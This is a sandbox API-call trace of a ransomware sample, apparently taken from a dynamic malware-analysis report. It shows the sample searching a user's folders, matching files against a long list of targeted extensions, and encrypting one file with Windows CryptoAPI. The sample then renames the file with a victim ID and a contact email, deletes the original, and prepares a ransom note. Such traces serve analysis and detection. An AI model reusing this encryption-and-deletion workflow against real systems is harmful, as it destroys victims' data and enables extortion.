	[0194.566] FindNextFileW (in: hFindFile=0xfb98f0, lpFindFileData=0x18a184 | out: lpFindFileData=0x18a184*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2a103730, ftCreationTime.dwHighDateTime=0x1d966e5, ftLastAccessTime.dwLowDateTime=0xf94a5620, ftLastAccessTime.dwHighDateTime=0x1d96893, ftLastWriteTime.dwLowDateTime=0xf94a5620, ftLastWriteTime.dwHighDateTime=0x1d96893, nFileSizeHigh=0x0, nFileSizeLow=0xbdbb, dwReserved0=0x0, dwReserved1=0x0, cFileName="uYA W3Gj.wav", cAlternateFileName="UYAW3G~1.WAV")) returned 1
	[0194.566] lstrcmpW (lpString1="uYA W3Gj.wav", lpString2="..") returned 1
	[0194.566] lstrcmpW (lpString1="uYA W3Gj.wav", lpString2=".") returned 1
	[0194.566] lstrcpyW (in: lpString1=0x18a3d4, lpString2="C:\\Users\\RDhJ0CNFevzX\\Music\\4 WeFFAYw8qt-MRv\\IZigkEMouwXCNeznLl\\C1Fpy4-8p1N\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Music\\4 WeFFAYw8qt-MRv\\IZigkEMouwXCNeznLl\\C1Fpy4-8p1N\\") returned="C:\\Users\\RDhJ0CNFevzX\\Music\\4 WeFFAYw8qt-MRv\\IZigkEMouwXCNeznLl\\C1Fpy4-8p1N\\"
	[0194.566] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Music\\4 WeFFAYw8qt-MRv\\IZigkEMouwXCNeznLl\\C1Fpy4-8p1N\\", lpString2="uYA W3Gj.wav" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Music\\4 WeFFAYw8qt-MRv\\IZigkEMouwXCNeznLl\\C1Fpy4-8p1N\\uYA W3Gj.wav") returned="C:\\Users\\RDhJ0CNFevzX\\Music\\4 WeFFAYw8qt-MRv\\IZigkEMouwXCNeznLl\\C1Fpy4-8p1N\\uYA W3Gj.wav"
	[0194.566] lstrlenW (lpString="C:\\Users\\RDhJ0CNFevzX\\Music\\4 WeFFAYw8qt-MRv\\IZigkEMouwXCNeznLl\\C1Fpy4-8p1N\\uYA W3Gj.wav") returned 88
	[0194.566] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0194.567] CharLowerBuffW (in: lpsz="C:\\Users\\RDhJ0CNFevzX\\Music\\4 WeFFAYw8qt-MRv\\IZigkEMouwXCNeznLl\\C1Fpy4-8p1N\\uYA W3Gj.wav", cchLength=0x58 | out: lpsz="c:\\users\\rdhj0cnfevzx\\music\\4 weffayw8qt-mrv\\izigkemouwxcneznll\\c1fpy4-8p1n\\uya w3gj.wav") returned 0x58
	[0194.567] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0194.567] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\music\\4 weffayw8qt-mrv\\izigkemouwxcneznll\\c1fpy4-8p1n\\uya w3gj.wav", lpSrch="help_decrypt_your_files") returned 0x0
	[0194.567] lstrcpyW (in: lpString1=0x189f7c, lpString2="c:\\users\\rdhj0cnfevzx\\music\\4 weffayw8qt-mrv\\izigkemouwxcneznll\\c1fpy4-8p1n\\uya w3gj.wav" | out: lpString1="c:\\users\\rdhj0cnfevzx\\music\\4 weffayw8qt-mrv\\izigkemouwxcneznll\\c1fpy4-8p1n\\uya w3gj.wav") returned="c:\\users\\rdhj0cnfevzx\\music\\4 weffayw8qt-mrv\\izigkemouwxcneznll\\c1fpy4-8p1n\\uya w3gj.wav"
	[0194.567] lstrlenW (lpString="c:\\users\\rdhj0cnfevzx\\music\\4 weffayw8qt-mrv\\izigkemouwxcneznll\\c1fpy4-8p1n\\uya w3gj.wav") returned 88
	[0194.567] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0194.568] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0194.568] StrStrW (lpFirst=".wav", lpSrch=".") returned=".wav"
	[0194.568] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0194.568] StrStrW (lpFirst=".3g2.3gp.7z.ab4.ach.adb.ads.ait.al.apj.asf.asm.asp.asx.back.bank.bgt.bik.bkf.bkp.bpw.c.cdf.cdr.cdx.ce1.ce2.cer.cfp.class.cls.cmt.cpi.cpp.craw.crt.crw.cs.csh.csl.csv.dac.dbr.ddd.der.des.dgc.dng.drf.k2p.dtd.dxg.ebd.eml.exf.ffd.fff.fh.fhd.fla.flac.flv.fm.gray.grey.grw.gry.h.hpp.ibd.iif.indd.java.key.laccdb.lua.m.m4v.maf.mam.mar.maw.mdc.mde.mfw.mmw.mp4.mpg.mpp.mrw.mso.ndd.nef.nk2.nsd.nsg.nsh.nwb.nx1.nx2.odc.odf.odg.odp.ods.oil.one.oth.otp.ots.p12.p7b.p7c.pas.pat.pbo.pcd.pct.pem.php.pip.pl.plc.pot.potm.potx.ppam.pps.ppsm.ppsx.prf.psafe3.pspimage.pub.puz.py.qba.qbw.r3d.raf.rar.rat.raw.rm.rwz.sas7bdat.say.sd0.sda.snp.srf.srt.st4.st5.st6.st7.st8.stc.std.sti.stx.sxc.sxi.sxm.vob.vsx.vtx.wav.wb2.wll.wmv.wpd.x11.xla.xlam.xlb.xlc.xll.xlm.xlr.xlsb.xlt.xltm.xltx.m4a.wma.d3dbsp.xlw.xpp.xsn.yuv.zip.sie.unrec.scan.sum.t13.t12.qdf.tax.pkpass.bc6.bc7.sidn.sidd.mddata.itl.icxs.hvpl.hplg.hkdb.mdbackup.syncdb.gho.cas.wmo.itm.sb.fos.mov.vdf.ztmp.sis.sid.ncf.menu.layout.dmp.blob.esm.vcf.vtf.dazip.fpk.mlx.kf.iwd.vpk.tor.psk.rim.w3x.fsh.ntl.arch00.lvl.snx.cfr.ff.vpp_pc.lrf.m2.mcmeta.vfs0.mpqge.db0.dba.rofl.hkx.bar.upk.das.litemod.asset.forge.bsa.apk.re4.lbf.slm.epk.rgss3a.pak.big.wallet.wotreplay.xxx.desc.m3u.js.rb.1cd.dbf.dt.cf.cfu.mxl.epf.kdbx.vrp.grs.geo.st.pff.mft.efd.3dm.3ds.rib.ma.sldasm.sldprt.max.blend.lwo.lws.m3d.mb.obj.x.x3d.movie.byu.c4d.fbx.dgn.dwg.4db.4dl.4mp.abs.accdb.accdc.accde.accdr.accdt.accdw.accft.adn.a3d.adp.aft.ahd.alf.ask.awdb.azz.bdb.bnd.bok.btr.bak.backup.cdb.ckp.clkw.cma.daconnections.dacpac.dad.dadiagrams.daf.daschema.db.db-shm.db-wal.db2.db3.dbc.dbk.dbs.dbt.dbv.dbx.dcb.dct.dcx.ddl.df1.dmo.dnc.dp1.dqy.dsk.dsn.dta.dtsx.dxl.eco.ecx.edb.emd.eql.fcd.fdb.fic.fid.fm5.fmp.fmp12.fmpsl.fol.fp3.fp4.fp5.fp7.fpt.fzb.fzv.gdb.gwi.hdb.his.ib.idc.ihx.itdb.itw.jtx.kdb.lgc.maq.mdb.mdbhtml.mdf.mdn.mdt.mrg.mud.mwb.s3m.myd.ndf.ns2.ns3.ns4.nsf.nv2.nyf.oce.odb.oqy.ora.orx.owc.owg.oyx.p96.p97.pan.pdb.pdm.phm.pnz.pth.pwa.qpx.qry.qvd.rctd.rdb.rpd.rsd.sbf.sdb.sdf.spq.sqb.stp.sql.sqlite.sqlite3.sqlitedb.str.tcx.tdt.te.teacher.trm.udb.usr.v12.vdb.vpd.wdb.wmdb.xdb.xld.xlgc.zdb.zdc.cdr3.ppt.pptx.1st.abw.act.aim.ans.apt.asc.ascii.ase.aty.awp.awt.aww.bad.bbs.bdp.bdr.bean.bib.bna.boc.btd.bzabw.chart.chord.cnm.crd.crwl.cyi.dca.dgs.diz.dne.doc.docm.docx.docxml.docz.dot.dotm.dotx.dsv.dvi.dx.eio.eit.email.emlx.epp.err.etf.etx.euc.fadein.faq.fbl.fcf.fdf.fdr.fds.fdt.fdx.fdxt.fes.fft.flr.fodt.fountain.gtp.frt.fwdn.fxc.gdoc.gio.gpn.gthr.gv.hbk.hht.hs.htc.hwp.hz.idx.iil.ipf.jarvis.jis.joe.jp1.jrtf.kes.klg.knt.kon.kwd.latex.lbt.lis.lit.lnt.lp2.lrc.lst.ltr.ltx.lue.luf.lwp.lxfml.lyt.lyx.man.map.mbox.md5txt.me.mell.min.mnt.msg.mwp.nfo.njx.notes.now.nwctxt.nzb.ocr.odm.odo.odt.ofl.oft.openbsd.ort.ott.p7s.pages.pfs.pfx.pjt.plantuml.prt.psw.pu.pvj.pvm.pwi.pwr.qdl.rad.readme.rft.ris.rng.rpt.rst.rt.rtd.rtf.rtx.run.rzk.rzn.saf.safetext.sam.scc.scm.scriv.scrivx.scw.sdm.sdoc.sdw.sgm.sig.skcard.sla.slagz.sls.smf.sms.ssa.strings.stw.sty.sub.sxg.sxw.tab.tdf.text.thp.tlb.tm.tmd.tmv.tmx.tpc.trelby.tvj.txt.u3d.u3i.unauth.unx.uof.uot.upd.utf8.unity.utxt.vct.vnt.vw.wbk.wcf.webdoc.wgz.wn.wp.wp4.wp5.wp6.wp7.wpa.wpl.wps.wpt.wpw.wri.wsc.wsd.wsh.wtx.xbdoc.xbplate.xdl.xlf.xps.xwp.xy3.xyp.xyw.ybk.yml.zabw.zw.2bp.0.36.3fr.411.73i.8xi.9png.abm.afx.agif.agp.aic.albm.apd.apm.aps.apx.artwork.arw.asw.avatar.bay.blkrt.bm2.bmp.bmx.bmz.brk.brn.brt.bss.bti.c4.cal.cals.can.cd5.cdc.cdg.cimg.cin.cit.colz.cpc.cpd.cpg.cps.cpx.cr2.ct.dc2.dcr.dds.dgt.dib.djv.dm3.dmi.vue.dpx.wire.drz.dt2.dtw.dvl.ecw.eip.erf.exr.fal.fax.fil.fpos.g3.gcdp.gfb.gfie.ggr.gif.gih.gim.gmbck.gmspr.spr.scad.gpd.gro.grob.hdr.hpi.i3d.icn.icpr.iiq.info.int.ipx.itc2.iwi.j.j2c.j2k.jas.jb2.jbig.jbig2.jbmp.jbr.jfif.jia.jng.jpg2.jps.jpx.jtf.jwl.jxr.kdc.kdi.kdk.kic.kpg.lbm.ljp.mac.mbm.mef.mnr.mos.mpf.mpo.mrxs.myl.ncr.nct.nlm.nrw.oc3.oc4.oc5.oci.omf.oplc.af2.af3.ai.art.asy.cdmm.cdmt.cdmtz.cdmz.cdt.cgm.cmx.cnv.csy.cv5.cvg.cvi.cvs.cvx.cwt.cxf.dcs.ded.design.dhs.dpp.drw.dxb.dxf.egc.ep.eps.epsf.fh10.fh11.fh3.fh4.fh5.fh6.fh7.fh8.fif.fig.fmv.ft10.ft11.ft7.ft8.ft9.ftn.fxg.gdraw.gem.glox.gsd.hpg.hpgl.hpl.idea.igt.igx.imd.ink.lmk.mgcb.mgmf.mgmt.mt9.mgmx.mgtx.mmat.mat.otg.ovp.ovr.pcs.pfd.pfv.pl.plt.vrml.pobj.psid.rdl.scv.sk1.sk2.slddrt.snagitstamps.snagstyles.ssk.stn.svf.svgz.sxd.tlc.tne.ufr.vbr.vec.vml.vsd.vsdm.vsdx.vstm.stm.vstx.wpg.vsm.vault.xar.xmind.xmmap.yal.orf.ota.oti.ozb.ozj.ozt.pal.pano.pap.pbm.pc1.pc2.pc3.pcd.pdd.pe4.pef.pfi.pgf.pgm.pi1.pi2.pi3.pic.pict.pix.pjpeg.pjpg.pm.pmg.pni.pnm.pntg.pop.pp4.pp5.ppm.prw.psdx.pse.psp.pspbrush.ptg.ptx.pvr.px.pxr.pz3.pza.pzp.pzs.z3d.qmg.ras.rcu.rgb.rgf.ric.riff.rix.rle.rli.rpf.rri.rs.rsb.rsr.rw2.rwl.s2mv.sai.sci.sct.sep.sfc.sfera.sfw.skm.sld.sob.spa.spe.sph.spj.spp.sr2.srw.ste.sumo.sva.save.ssfn.t2b.tb0.tbn.tex.tfc.tg4.thm.thumb.tjp.tm2.tn.tpi.ufo.uga.usertile-ms.vda.vff.vpe.vst.wb1.wbc.wbd.wbm.wbmp.wbz.wdp.webp.wpb.wpe.wvl.x3f.y.ysp.zif.cdr4.cdr6.cdrw.jpeg.djvu.pdf.ddoc.css.pptm.raw.cpt.jpg.jpe.jp2.pcx.pdn.png.psd.tga.tiff.tif.hdp.xpm.ai.ps.wmf.emf.ani.apng.flc.fb2.fb3.fli.mng.smil.svg.mobi.swf.html.xls.xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim", lpSrch=".wav") returned=".wav.wb2.wll.wmv.wpd.x11.xla.xlam.xlb.xlc.xll.xlm.xlr.xlsb.xlt.xltm.xltx.m4a.wma.d3dbsp.xlw.xpp.xsn.yuv.zip.sie.unrec.scan.sum.t13.t12.qdf.tax.pkpass.bc6.bc7.sidn.sidd.mddata.itl.icxs.hvpl.hplg.hkdb.mdbackup.syncdb.gho.cas.wmo.itm.sb.fos.mov.vdf.ztmp.sis.sid.ncf.menu.layout.dmp.blob.esm.vcf.vtf.dazip.fpk.mlx.kf.iwd.vpk.tor.psk.rim.w3x.fsh.ntl.arch00.lvl.snx.cfr.ff.vpp_pc.lrf.m2.mcmeta.vfs0.mpqge.db0.dba.rofl.hkx.bar.upk.das.litemod.asset.forge.bsa.apk.re4.lbf.slm.epk.rgss3a.pak.big.wallet.wotreplay.xxx.desc.m3u.js.rb.1cd.dbf.dt.cf.cfu.mxl.epf.kdbx.vrp.grs.geo.st.pff.mft.efd.3dm.3ds.rib.ma.sldasm.sldprt.max.blend.lwo.lws.m3d.mb.obj.x.x3d.movie.byu.c4d.fbx.dgn.dwg.4db.4dl.4mp.abs.accdb.accdc.accde.accdr.accdt.accdw.accft.adn.a3d.adp.aft.ahd.alf.ask.awdb.azz.bdb.bnd.bok.btr.bak.backup.cdb.ckp.clkw.cma.daconnections.dacpac.dad.dadiagrams.daf.daschema.db.db-shm.db-wal.db2.db3.dbc.dbk.dbs.dbt.dbv.dbx.dcb.dct.dcx.ddl.df1.dmo.dnc.dp1.dqy.dsk.dsn.dta.dtsx.dxl.eco.ecx.edb.emd.eql.fcd.fdb.fic.fid.fm5.fmp.fmp12.fmpsl.fol.fp3.fp4.fp5.fp7.fpt.fzb.fzv.gdb.gwi.hdb.his.ib.idc.ihx.itdb.itw.jtx.kdb.lgc.maq.mdb.mdbhtml.mdf.mdn.mdt.mrg.mud.mwb.s3m.myd.ndf.ns2.ns3.ns4.nsf.nv2.nyf.oce.odb.oqy.ora.orx.owc.owg.oyx.p96.p97.pan.pdb.pdm.phm.pnz.pth.pwa.qpx.qry.qvd.rctd.rdb.rpd.rsd.sbf.sdb.sdf.spq.sqb.stp.sql.sqlite.sqlite3.sqlitedb.str.tcx.tdt.te.teacher.trm.udb.usr.v12.vdb.vpd.wdb.wmdb.xdb.xld.xlgc.zdb.zdc.cdr3.ppt.pptx.1st.abw.act.aim.ans.apt.asc.ascii.ase.aty.awp.awt.aww.bad.bbs.bdp.bdr.bean.bib.bna.boc.btd.bzabw.chart.chord.cnm.crd.crwl.cyi.dca.dgs.diz.dne.doc.docm.docx.docxml.docz.dot.dotm.dotx.dsv.dvi.dx.eio.eit.email.emlx.epp.err.etf.etx.euc.fadein.faq.fbl.fcf.fdf.fdr.fds.fdt.fdx.fdxt.fes.fft.flr.fodt.fountain.gtp.frt.fwdn.fxc.gdoc.gio.gpn.gthr.gv.hbk.hht.hs.htc.hwp.hz.idx.iil.ipf.jarvis.jis.joe.jp1.jrtf.kes.klg.knt.kon.kwd.latex.lbt.lis.lit.lnt.lp2.lrc.lst.ltr.ltx.lue.luf.lwp.lxfml.lyt.lyx.man.map.mbox.md5txt.me.mell.min.mnt.msg.mwp.nfo.njx.notes.now.nwctxt.nzb.ocr.odm.odo.odt.ofl.oft.openbsd.ort.ott.p7s.pages.pfs.pfx.pjt.plantuml.prt.psw.pu.pvj.pvm.pwi.pwr.qdl.rad.readme.rft.ris.rng.rpt.rst.rt.rtd.rtf.rtx.run.rzk.rzn.saf.safetext.sam.scc.scm.scriv.scrivx.scw.sdm.sdoc.sdw.sgm.sig.skcard.sla.slagz.sls.smf.sms.ssa.strings.stw.sty.sub.sxg.sxw.tab.tdf.text.thp.tlb.tm.tmd.tmv.tmx.tpc.trelby.tvj.txt.u3d.u3i.unauth.unx.uof.uot.upd.utf8.unity.utxt.vct.vnt.vw.wbk.wcf.webdoc.wgz.wn.wp.wp4.wp5.wp6.wp7.wpa.wpl.wps.wpt.wpw.wri.wsc.wsd.wsh.wtx.xbdoc.xbplate.xdl.xlf.xps.xwp.xy3.xyp.xyw.ybk.yml.zabw.zw.2bp.0.36.3fr.411.73i.8xi.9png.abm.afx.agif.agp.aic.albm.apd.apm.aps.apx.artwork.arw.asw.avatar.bay.blkrt.bm2.bmp.bmx.bmz.brk.brn.brt.bss.bti.c4.cal.cals.can.cd5.cdc.cdg.cimg.cin.cit.colz.cpc.cpd.cpg.cps.cpx.cr2.ct.dc2.dcr.dds.dgt.dib.djv.dm3.dmi.vue.dpx.wire.drz.dt2.dtw.dvl.ecw.eip.erf.exr.fal.fax.fil.fpos.g3.gcdp.gfb.gfie.ggr.gif.gih.gim.gmbck.gmspr.spr.scad.gpd.gro.grob.hdr.hpi.i3d.icn.icpr.iiq.info.int.ipx.itc2.iwi.j.j2c.j2k.jas.jb2.jbig.jbig2.jbmp.jbr.jfif.jia.jng.jpg2.jps.jpx.jtf.jwl.jxr.kdc.kdi.kdk.kic.kpg.lbm.ljp.mac.mbm.mef.mnr.mos.mpf.mpo.mrxs.myl.ncr.nct.nlm.nrw.oc3.oc4.oc5.oci.omf.oplc.af2.af3.ai.art.asy.cdmm.cdmt.cdmtz.cdmz.cdt.cgm.cmx.cnv.csy.cv5.cvg.cvi.cvs.cvx.cwt.cxf.dcs.ded.design.dhs.dpp.drw.dxb.dxf.egc.ep.eps.epsf.fh10.fh11.fh3.fh4.fh5.fh6.fh7.fh8.fif.fig.fmv.ft10.ft11.ft7.ft8.ft9.ftn.fxg.gdraw.gem.glox.gsd.hpg.hpgl.hpl.idea.igt.igx.imd.ink.lmk.mgcb.mgmf.mgmt.mt9.mgmx.mgtx.mmat.mat.otg.ovp.ovr.pcs.pfd.pfv.pl.plt.vrml.pobj.psid.rdl.scv.sk1.sk2.slddrt.snagitstamps.snagstyles.ssk.stn.svf.svgz.sxd.tlc.tne.ufr.vbr.vec.vml.vsd.vsdm.vsdx.vstm.stm.vstx.wpg.vsm.vault.xar.xmind.xmmap.yal.orf.ota.oti.ozb.ozj.ozt.pal.pano.pap.pbm.pc1.pc2.pc3.pcd.pdd.pe4.pef.pfi.pgf.pgm.pi1.pi2.pi3.pic.pict.pix.pjpeg.pjpg.pm.pmg.pni.pnm.pntg.pop.pp4.pp5.ppm.prw.psdx.pse.psp.pspbrush.ptg.ptx.pvr.px.pxr.pz3.pza.pzp.pzs.z3d.qmg.ras.rcu.rgb.rgf.ric.riff.rix.rle.rli.rpf.rri.rs.rsb.rsr.rw2.rwl.s2mv.sai.sci.sct.sep.sfc.sfera.sfw.skm.sld.sob.spa.spe.sph.spj.spp.sr2.srw.ste.sumo.sva.save.ssfn.t2b.tb0.tbn.tex.tfc.tg4.thm.thumb.tjp.tm2.tn.tpi.ufo.uga.usertile-ms.vda.vff.vpe.vst.wb1.wbc.wbd.wbm.wbmp.wbz.wdp.webp.wpb.wpe.wvl.x3f.y.ysp.zif.cdr4.cdr6.cdrw.jpeg.djvu.pdf.ddoc.css.pptm.raw.cpt.jpg.jpe.jp2.pcx.pdn.png.psd.tga.tiff.tif.hdp.xpm.ai.ps.wmf.emf.ani.apng.flc.fb2.fb3.fli.mng.smil.svg.mobi.swf.html.xls.xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim"
	[0194.568] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0194.569] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0194.569] CreateFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\music\\4 weffayw8qt-mrv\\izigkemouwxcneznll\\c1fpy4-8p1n\\uya w3gj.wav" (normalized: "c:\\users\\rdhj0cnfevzx\\music\\4 weffayw8qt-mrv\\izigkemouwxcneznll\\c1fpy4-8p1n\\uya w3gj.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x390
	[0194.573] ReadFile (in: hFile=0x390, lpBuffer=0xfdd180, nNumberOfBytesToRead=0xbdbb, lpNumberOfBytesRead=0x189930, lpOverlapped=0x0 | out: lpBuffer=0xfdd180*, lpNumberOfBytesRead=0x189930*=0xbdbb, lpOverlapped=0x0) returned 1
	[0194.577] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0194.577] CryptAcquireContextW (in: phProv=0x1894e0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1894e0*=0xfcae68) returned 1
	[0194.579] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0194.579] CryptCreateHash (in: hProv=0xfcae68, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1894e4 | out: phHash=0x1894e4) returned 1
	[0194.579] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0194.580] CryptHashData (hHash=0xfb8f70, pbData=0xfc0b90, dwDataLen=0x10c, dwFlags=0x0) returned 1
	[0194.580] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0194.580] CryptDeriveKey (in: hProv=0xfcae68, Algid=0x6610, hBaseData=0xfb8f70, dwFlags=0x1, phKey=0x1894e8 | out: phKey=0x1894e8*=0xfb8ff0) returned 1
	[0194.580] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0194.580] CryptEncrypt (in: hKey=0xfb8ff0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x1894fc*=0xbdbb, dwBufLen=0xbdbb | out: pbData=0x0*, pdwDataLen=0x1894fc*=0xbdc0) returned 1
	[0194.582] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0194.582] RtlMoveMemory (in: Destination=0xfe8f48, Source=0xfdd180, Length=0xbdbb | out: Destination=0xfe8f48) 
	[0194.582] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0194.582] CryptEncrypt (in: hKey=0xfb8ff0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xfe8f48*, pdwDataLen=0x1894dc*=0xbdbb, dwBufLen=0xbdc0 | out: pbData=0xfe8f48*, pdwDataLen=0x1894dc*=0xbdc0) returned 1
	[0194.583] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0194.583] CryptDestroyKey (hKey=0xfb8ff0) returned 1
	[0194.583] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0194.583] CryptDestroyHash (hHash=0xfb8f70) returned 1
	[0194.583] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0194.583] CryptReleaseContext (hProv=0xfcae68, dwFlags=0x0) returned 1
	[0194.583] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0194.584] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x1894f8, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x1894f8*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0194.584] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0194.585] GetUserNameA (in: lpBuffer=0x1893dc, pcbBuffer=0x1894f4 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x1894f4) returned 1
	[0194.586] wsprintfW (in: param_1=0x189510, param_2="%s.id_%x%x_email_enc2@dr.com_.scl" | out: param_1="c:\\users\\rdhj0cnfevzx\\music\\4 weffayw8qt-mrv\\izigkemouwxcneznll\\c1fpy4-8p1n\\uya w3gj.wav.id_c287f3826d6e218_email_enc2@dr.com_.scl") returned 130
	[0194.586] CreateFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\music\\4 weffayw8qt-mrv\\izigkemouwxcneznll\\c1fpy4-8p1n\\uya w3gj.wav.id_c287f3826d6e218_email_enc2@dr.com_.scl" (normalized: "c:\\users\\rdhj0cnfevzx\\music\\4 weffayw8qt-mrv\\izigkemouwxcneznll\\c1fpy4-8p1n\\uya w3gj.wav.id_c287f3826d6e218_email_enc2@dr.com_.scl"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x39c
	[0194.586] WriteFile (in: hFile=0x39c, lpBuffer=0xfe8f48*, nNumberOfBytesToWrite=0xbdc0, lpNumberOfBytesWritten=0x189938, lpOverlapped=0x0 | out: lpBuffer=0xfe8f48*, lpNumberOfBytesWritten=0x189938*=0xbdc0, lpOverlapped=0x0) returned 1
	[0194.592] CloseHandle (hObject=0x39c) returned 1
	[0194.593] CloseHandle (hObject=0x390) returned 1
	[0194.593] DeleteFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\music\\4 weffayw8qt-mrv\\izigkemouwxcneznll\\c1fpy4-8p1n\\uya w3gj.wav" (normalized: "c:\\users\\rdhj0cnfevzx\\music\\4 weffayw8qt-mrv\\izigkemouwxcneznll\\c1fpy4-8p1n\\uya w3gj.wav")) returned 1
	[0194.600] DeleteFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\music\\4 weffayw8qt-mrv\\izigkemouwxcneznll\\c1fpy4-8p1n\\uya w3gj.wav" (normalized: "c:\\users\\rdhj0cnfevzx\\music\\4 weffayw8qt-mrv\\izigkemouwxcneznll\\c1fpy4-8p1n\\uya w3gj.wav")) returned 0
	[0194.600] FindNextFileW (in: hFindFile=0xfb98f0, lpFindFileData=0x18a184 | out: lpFindFileData=0x18a184*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2a103730, ftCreationTime.dwHighDateTime=0x1d966e5, ftLastAccessTime.dwLowDateTime=0xf94a5620, ftLastAccessTime.dwHighDateTime=0x1d96893, ftLastWriteTime.dwLowDateTime=0xf94a5620, ftLastWriteTime.dwHighDateTime=0x1d96893, nFileSizeHigh=0x0, nFileSizeLow=0xbdbb, dwReserved0=0x0, dwReserved1=0x0, cFileName="uYA W3Gj.wav", cAlternateFileName="UYAW3G~1.WAV")) returned 0
	[0194.600] FindClose (in: hFindFile=0xfb98f0 | out: hFindFile=0xfb98f0) returned 1
	[0194.600] FindClose (in: hFindFile=0xfb98f0 | out: hFindFile=0xfb98f0) returned 0
	[0194.601] lstrcpyW (in: lpString1=0x189d74, lpString2="C:\\Users\\RDhJ0CNFevzX\\Music\\4 WeFFAYw8qt-MRv\\IZigkEMouwXCNeznLl\\C1Fpy4-8p1N" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Music\\4 WeFFAYw8qt-MRv\\IZigkEMouwXCNeznLl\\C1Fpy4-8p1N") returned="C:\\Users\\RDhJ0CNFevzX\\Music\\4 WeFFAYw8qt-MRv\\IZigkEMouwXCNeznLl\\C1Fpy4-8p1N"
	[0194.601] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Music\\4 WeFFAYw8qt-MRv\\IZigkEMouwXCNeznLl\\C1Fpy4-8p1N", lpString2="\\*.*" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Music\\4 WeFFAYw8qt-MRv\\IZigkEMouwXCNeznLl\\C1Fpy4-8p1N\\*.*") returned="C:\\Users\\RDhJ0CNFevzX\\Music\\4 WeFFAYw8qt-MRv\\IZigkEMouwXCNeznLl\\C1Fpy4-8p1N\\*.*"
	[0194.601] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0194.601] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0194.601] wsprintfW (in: param_1=0x189660, param_2="%s\\HELP_DECRYPT_YOUR_FILES.TXT" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\Music\\4 WeFFAYw8qt-MRv\\IZigkEMouwXCNeznLl\\C1Fpy4-8p1N\\HELP_DECRYPT_YOUR_FILES.TXT") returned 103
